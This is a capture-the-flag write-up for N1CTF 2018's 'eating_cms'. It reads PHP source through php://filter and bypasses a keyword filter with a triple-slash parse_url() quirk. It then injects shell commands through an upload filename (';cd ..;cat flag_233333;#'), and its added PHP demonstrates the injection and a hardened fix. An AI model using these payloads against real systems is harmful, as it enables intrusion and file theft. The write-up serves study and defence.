[N1CTF 2018]eating_cms_


Information gathering

The entry point is a login page. Capturing the login request suggests SQL injection, but spaces, `%`, `|` and similar characters are all blocked by the WAF, so injection is not an easy route. Start with information gathering instead.

A one-minute directory scan turns up a .viminfo file and register.php.

.viminfo is the file Vim writes on exit to record its state (command-line history, marks, recently edited files), so a copy leaked from the web root tells you which files were edited on the server.

Directory scan results:

200  /index.php
200  /login.php
200  /register.php
200  /.viminfo
403  /.htaccess

Command-line history recorded in /.viminfo:

vim updateadmin.php
vim info.php
vim login.php

This reveals info.php and updateadmin.php. Requesting either directly only returns "you can not visit it directly", so register an account first.

Registering as admin returns "Username has been registered!", so an admin account already exists.

Once logged in, the URL (user.php?page=...) looks like a file inclusion. Use the php://filter wrapper to read the source of user.php:

/user.php?page=php://filter/convert.base64-encode/resource=user

Code audit

user.php:

<?php
require_once("function.php");
if( !isset( $_SESSION['user'] )){
    Header("Location: index.php");

}
if($_SESSION['isadmin'] === '1'){
    $oper_you_can_do = $OPERATE_admin;
}else{
    $oper_you_can_do = $OPERATE;
}
//die($_SESSION['isadmin']);
if($_SESSION['isadmin'] === '1'){
    if(!isset($_GET['page']) || $_GET['page'] === ''){
        $page = 'info';
    }else {
        $page = $_GET['page'];
    }
}
else{
    if(!isset($_GET['page'])|| $_GET['page'] === ''){
        $page = 'guest';
    }else {
        $page = $_GET['page'];
        if($page === 'info')
        {
//            echo("<script>alert('no premission to visit info, only admin can, you are guest')</script>");
            Header("Location: user.php?page=guest");
        }
    }
}
filter_directory();
//if(!in_array($page,$oper_you_can_do)){
//    $page = 'info';
//}
include "$page.php";
?>

/user.php?page=php://filter/convert.base64-encode/resource=function

function.php:

<?php
session_start();
require_once "config.php";
function Hacker()
{
    Header("Location: hacker.php");
    die();
}


function filter_directory()
{
    $keywords = ["flag","manage","ffffllllaaaaggg"];
    $uri = parse_url($_SERVER["REQUEST_URI"]);
    parse_str($uri['query'], $query);
//    var_dump($query);
//    die();
    foreach($keywords as $token)
    {
        foreach($query as $k => $v)
        {
            if (stristr($k, $token))
                hacker();
            if (stristr($v, $token))
                hacker();
        }
    }
}

function filter_directory_guest()
{
    $keywords = ["flag","manage","ffffllllaaaaggg","info"];
    $uri = parse_url($_SERVER["REQUEST_URI"]);
    parse_str($uri['query'], $query);
//    var_dump($query);
//    die();
    foreach($keywords as $token)
    {
        foreach($query as $k => $v)
        {
            if (stristr($k, $token))
                hacker();
            if (stristr($v, $token))
                hacker();
        }
    }
}

function Filter($string)
{
    global $mysqli;
    $blacklist = "information|benchmark|order|limit|join|file|into|execute|column|extractvalue|floor|update|insert|delete|username|password";
    $whitelist = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'(),_*`-@=+><";
    for ($i = 0; $i < strlen($string); $i++) {
        if (strpos("$whitelist", $string[$i]) === false) {
            Hacker();
        }
    }
    if (preg_match("/$blacklist/is", $string)) {
        Hacker();
    }
    if (is_string($string)) {
        return $mysqli->real_escape_string($string);
    } else {
        return "";
    }
}

function sql_query($sql_query)
{
    global $mysqli;
    $res = $mysqli->query($sql_query);
    return $res;
}

function login($user, $pass)
{
    $user = Filter($user);
    $pass = md5($pass);
    $sql = "select * from `albert_users` where `username_which_you_do_not_know`= '$user' and `password_which_you_do_not_know_too` = '$pass'";
    echo $sql;
    $res = sql_query($sql);
//    var_dump($res);
//    die();
    if ($res->num_rows) {
        $data = $res->fetch_array();
        $_SESSION['user'] = $data[username_which_you_do_not_know];
        $_SESSION['login'] = 1;
        $_SESSION['isadmin'] = $data[isadmin_which_you_do_not_know_too_too];
        return true;
    } else {
        return false;
    }
    return;
}

function updateadmin($level,$user)
{
    $sql = "update `albert_users` set `isadmin_which_you_do_not_know_too_too` = '$level' where `username_which_you_do_not_know`='$user' ";
    echo $sql;
    $res = sql_query($sql);
//    var_dump($res);
//    die();
//    die($res);
    if ($res == 1) {
        return true;
    } else {
        return false;
    }
    return;
}

function register($user, $pass)
{
    global $mysqli;
    $user = Filter($user);
    $pass = md5($pass);
    $sql = "insert into `albert_users`(`username_which_you_do_not_know`,`password_which_you_do_not_know_too`,`isadmin_which_you_do_not_know_too_too`) VALUES ('$user','$pass','0')";
    $res = sql_query($sql);
    return $mysqli->insert_id;
}

function logout()
{
    session_destroy();
    Header("Location: index.php");
}

?>

/user.php?page=php://filter/convert.base64-encode/resource=config

config.php:

<?php
error_reporting(E_ERROR | E_WARNING | E_PARSE);
define(BASEDIR, "/var/www/html/");
define(FLAG_SIG, 1);
$OPERATE = array('userinfo','upload','search');
$OPERATE_admin = array('userinfo','upload','search','manage');
$DBHOST = "localhost";
$DBUSER = "root";
$DBPASS = "Nu1LCTF2018!@#qwe";
//$DBPASS = "";
$DBNAME = "N1CTF";
$mysqli = @new mysqli($DBHOST, $DBUSER, $DBPASS, $DBNAME);
if(mysqli_connect_errno()){
    echo "no sql connection".mysqli_connect_error();
    $mysqli=null;
    die();
}
?>

Three things stand out. First, the keyword list in filter_directory(), $keywords = ["flag","manage","ffffllllaaaaggg"], is what the application refuses to see in any query-string key or value, which strongly suggests pages with those names exist and hold something important. Second, the in_array() check of $page against $OPERATE / $OPERATE_admin in user.php is commented out, so include "$page.php" takes $_GET['page'] as-is and filter_directory() is the only guard; that is why php://filter works for any page name the keyword list does not catch. Third, Filter() explains the "WAF" seen at the login form: its character whitelist contains no space, `%` or `|`, and a keyword blacklist is applied on top, so the SQL route is not worth pursuing.

parse_url() parsing bypass

$keywords = ["flag","manage","ffffllllaaaaggg"];
$uri = parse_url($_SERVER["REQUEST_URI"]);
parse_str($uri['query'], $query);

Here is how the filter processes a request. For a normal URL, parse_url() splits it into components and the query part is what the filter inspects:

<?php
$a="http://78fc9602-02c3-44ec-80cc-3d0163ecb605.node4.buuoj.cn:81/user.php?page=guest";
$uri = parse_url($a);
print_r($uri);
//parse_str($uri[''], $query);
?>

Array
(
    [scheme] => http
    [host] => 78fc9602-02c3-44ec-80cc-3d0163ecb605.node4.buuoj.cn
    [port] => 81
    [path] => /user.php
    [query] => page=guest
)

<?php
$a="http://78fc9602-02c3-44ec-80cc-3d0163ecb605.node4.buuoj.cn:81/user.php?page=guest";
$uri = parse_url($a);
//print_r($uri);
parse_str($uri['query'],$query);
print_r($query);
//parse_str($uri[''], $query);
?>

Array
(
    [page] => guest
)

The PHP version on the target turns out to be 5.5.9.

That version lets us exploit a parse_url() quirk. When the request path starts with three slashes, parse_url() treats the string as a scheme-relative URL, finds an empty host and returns false (PHP 5.4.7 and later). $uri['query'] on a false value silently yields null on the 5.x series, parse_str() then leaves $query as an empty array, and filter_directory() has nothing to check. The web server, on the other hand, never calls parse_url(): it fills $_GET['page'] from the raw query string regardless of the leading slashes, so the include still receives the php://filter wrapper and the blocked names go through.
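To see the decision the filter takes on each form of the request, here is an added PHP script (mine, not part of the challenge or of this write-up) that reproduces filter_directory() with the REQUEST_URI passed in as an argument and, next to it, what the SAPI puts into $_GET for the same request. The helper names filter_directory_blocks() and sapi_get() are my own; the keyword list and the payload are the ones from the source above. It is written for PHP 7 or later; the parse_url() result for the triple-slash case is the same on the target's 5.5.9.

```php
<?php
// Added example: reproduce filter_directory() for a given REQUEST_URI and compare
// its view of the query string with the one the SAPI puts into $_GET.
// Run: php parse_url_bypass.php

/** Mirror of the challenge's filter_directory(); true where the original would call hacker(). */
function filter_directory_blocks(string $request_uri): bool
{
    $keywords = ["flag", "manage", "ffffllllaaaaggg"];
    $uri = parse_url($request_uri);

    // The original runs parse_str($uri['query'], $query) unconditionally. When
    // parse_url() returns false, $uri['query'] yields null and parse_str() leaves
    // $query empty; the guard below only makes that explicit.
    $query = [];
    if (is_array($uri) && isset($uri['query'])) {
        parse_str($uri['query'], $query);
    }

    foreach ($keywords as $token) {
        foreach ($query as $k => $v) {
            if (!is_string($v)) {
                continue; // page[]=... arrives as an array; stristr() on it is a TypeError in PHP 8
            }
            if (stristr((string) $k, $token) !== false || stristr($v, $token) !== false) {
                return true;
            }
        }
    }
    return false;
}

/** What $_GET looks like: the SAPI splits on the first '?' and never involves parse_url(). */
function sapi_get(string $request_uri): array
{
    $get = [];
    $q = strpos($request_uri, '?');
    if ($q !== false) {
        parse_str(substr($request_uri, $q + 1), $get);
    }
    return $get;
}

$payload = 'page=php://filter/convert.base64-encode/resource=ffffllllaaaaggg';
$cases = [
    '/user.php?' . $payload,    // normal request: fully parsed, keyword found
    '//user.php?' . $payload,   // "user.php" is taken as the host, query still parsed
    '///user.php?' . $payload,  // empty host: parse_url() returns false, nothing to inspect
];

foreach ($cases as $uri) {
    $parsed = parse_url($uri);
    printf("%-78s parse_url=%-5s blocked=%-3s \$_GET[page]=%s\n",
        $uri,
        is_array($parsed) ? 'array' : var_export($parsed, true),
        filter_directory_blocks($uri) ? 'yes' : 'no',
        sapi_get($uri)['page'] ?? '(none)');
}
```

Only the first two cases are blocked. With `//user.php` parse_url() takes user.php as the host but still extracts the query, so the keyword is found; with `///user.php` it gives up on the empty host and returns false, the filter loops over an empty array, and $_GET['page'] still carries the php://filter wrapper. The notice that the original code would raise on indexing false is hidden anyway by the error_reporting() call in config.php.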

///user.php?page=php://filter/convert.base64-encode/resource=ffffllllaaaaggg

<?php
if (FLAG_SIG != 1){
    die("you can not visit it directly");
}else {
    echo "you can find sth in m4aaannngggeee";
}
?>

///user.php?page=php://filter/convert.base64-encode/resource=m4aaannngggeee

<?php
if (FLAG_SIG != 1){
    die("you can not visit it directly");
}
include "templates/upload.html";
?>

FLAG_SIG is defined in config.php, which is only loaded through user.php, so these pages print "you can not visit it directly" when requested on their own; through the include they work. An upload attempt from the form fails, but it reveals the handler /templates/upllloadddd.php.

Read the source of upllloadddd.php the same way:

<?php
$allowtype = array("gif","png","jpg");
$size = 10000000;
$path = "./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/";
$filename = $_FILES['file']['name'];
if(is_uploaded_file($_FILES['file']['tmp_name'])){
    if(!move_uploaded_file($_FILES['file']['tmp_name'],$path.$filename)){
        die("error:can not move");
    }
}else{
    die("error:not an upload file！");
}
$newfile = $path.$filename;
echo "file upload success<br />";
echo $filename;
$picdata = system("cat ./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/".$filename." | base64 -w 0");
echo "<img src='data:image/png;base64,".$picdata."'></img>";
if($_FILES['file']['error']>0){
    unlink($newfile);
    die("Upload file error: ");
}
$ext = array_pop(explode(".",$_FILES['file']['name']));
if(!in_array($ext,$allowtype)){
    unlink($newfile);
}
?>

The key line is $picdata = system("cat ./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/".$filename." | base64 -w 0"); $filename comes straight from the filename field of the multipart Content-Disposition header and is concatenated into a shell command with no escaping. The extension check runs only afterwards and merely unlinks the file, so the command injection fires before any validation takes place.

The next step is locating the upload form. user.php?page=updateadmin has no upload form; the actual upload point (confirmed from an existing write-up) is /user.php?page=m4aaannngggeee, which matches the source read above: m4aaannngggeee.php includes templates/upload.html, and that form submits to /templates/upllloadddd.php.

A `/` cannot be used in the injected filename: when PHP parses the multipart body it keeps only the part of the filename after the last `/` (or `\`) in $_FILES['file']['name'], so a path separator truncates the payload instead of escaping the upload directory, and one that survived would make move_uploaded_file() fail before the command runs. Use cd .. rather than an absolute path.

Upload any file with the multipart filename set to:

filename=;cd ..;ls ;#

The resulting command is cat ./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/;cd ..;ls ;# | base64 -w 0: cat fails on the directory, cd .. and ls run, and # comments out the pipe to base64, so the raw listing comes back (system() echoes the command's output into the response). The listing shows flag_233333 in the parent directory; read it the same way:

filename=;cd ..;cat flag_233333;#
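As an added example (mine, not the challenge's code), the following PHP shows, for a few constructed filenames, what the multipart parser leaves in $_FILES['file']['name'], the exact command line the original handler would hand to system(), and a hardened replacement for the handler that validates extension and content first, stores under a server-chosen name, and builds the preview without a shell. The functions vulnerable_command(), sapi_filename(), safe_extension() and hardened_store() are names I chose; nothing here executes the command, it is only built as a string. Written for PHP 7.1 or later.

```php
<?php
// Added example, not the challenge's code: what the upload handler does with the
// client-supplied filename, and how to write it so that name never reaches a shell.
// Run: php upload_filename.php

const UPLOAD_DIR = './upload_b3bb2cfed6371dfeb2db1dbcceb124d3/';

/** The command line the original handler passes to system(); built here, never executed. */
function vulnerable_command(string $filename): string
{
    return "cat " . UPLOAD_DIR . $filename . " | base64 -w 0";
}

/**
 * What PHP's multipart parser leaves in $_FILES['file']['name']: everything up to and
 * including the last '/' or '\' is dropped (main/rfc1867.c), so a path separator in the
 * payload truncates it rather than escaping the upload directory.
 */
function sapi_filename(string $client_name): string
{
    $cut = -1;
    foreach (['/', '\\'] as $sep) {
        $pos = strrpos($client_name, $sep);
        if ($pos !== false && $pos > $cut) {
            $cut = $pos;
        }
    }
    return $cut === -1 ? $client_name : substr($client_name, $cut + 1);
}

/** Allowed extension (lower-cased, last component only) or null; checked before anything is moved. */
function safe_extension(string $name): ?string
{
    $allow = ['gif', 'png', 'jpg'];
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    return in_array($ext, $allow, true) ? $ext : null;
}

/**
 * Hardened handler: validate first, pick our own file name, read the file back in PHP
 * instead of through `cat ... | base64`. Returns ['ok' => false, 'error' => ...] or
 * ['ok' => true, 'path' => ..., 'img' => ...].
 */
function hardened_store(string $tmp_path, string $client_name): array
{
    $mime = ['gif' => 'image/gif', 'png' => 'image/png', 'jpg' => 'image/jpeg'];
    $ext = safe_extension(sapi_filename($client_name));
    if ($ext === null) {
        return ['ok' => false, 'error' => 'extension not allowed'];
    }
    // The bytes must be that image type, not merely named like one.
    $info = @getimagesize($tmp_path);
    if ($info === false || $info['mime'] !== $mime[$ext]) {
        return ['ok' => false, 'error' => 'content is not ' . $mime[$ext]];
    }
    if (!is_uploaded_file($tmp_path)) {
        return ['ok' => false, 'error' => 'not an uploaded file'];
    }
    $stored = UPLOAD_DIR . bin2hex(random_bytes(16)) . '.' . $ext;  // client string never used
    if (!move_uploaded_file($tmp_path, $stored)) {
        return ['ok' => false, 'error' => 'cannot move'];
    }
    $data = base64_encode(file_get_contents($stored));              // no shell involved
    return ['ok' => true, 'path' => $stored, 'img' => "data:{$mime[$ext]};base64,{$data}"];
}

// Constructed filenames: a normal one, the two payloads from the write-up, and one with a slash.
$names = [
    'cat.png',
    ';cd ..;ls ;#',
    ';cd ..;cat flag_233333;#',
    ';cat /etc/passwd;#',  // the '/' makes PHP keep only "passwd;#": no injection reaches the shell
];
foreach ($names as $n) {
    $seen = sapi_filename($n);
    printf("client: %-28s \$_FILES name: %-26s ext allowed: %-3s\n    command: %s\n",
        var_export($n, true), var_export($seen, true),
        safe_extension($seen) === null ? 'no' : 'yes',
        vulnerable_command($seen));
}
```

The printout makes the ordering problem visible: for ';cd ..;ls ;#' the original handler's array_pop(explode(".", ...)) yields ';ls ;#', which is not in $allowtype, so the file is unlinked, but only after system() has already run the injected commands. hardened_store() reverses that order and, because the stored name is generated server-side and the preview is produced with file_get_contents() and base64_encode(), there is no command line for the filename to break out of.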
